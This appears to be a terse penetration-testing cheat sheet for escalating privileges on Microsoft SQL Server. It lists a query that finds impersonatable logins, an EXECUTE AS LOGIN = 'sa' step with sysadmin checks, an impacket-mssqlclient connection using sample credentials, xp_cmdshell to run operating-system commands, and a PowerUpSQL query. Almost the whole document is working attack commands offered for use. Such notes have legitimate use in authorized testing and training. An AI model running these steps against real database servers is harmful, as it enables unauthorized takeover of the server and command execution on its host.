# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Impacket-MSSQLClient
impacket-mssqlclient admin:p@ssw0rd@10.10.10.1
# check if we have 'sa' privilege
select IS_SRVROLEMEMBER ('sysadmin')
# execute command using xp_cmdshell
xp_cmdshell "whoami /priv"
Get-SQLQuery -Instance 'WEB06\SQLEXPRESS' -query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"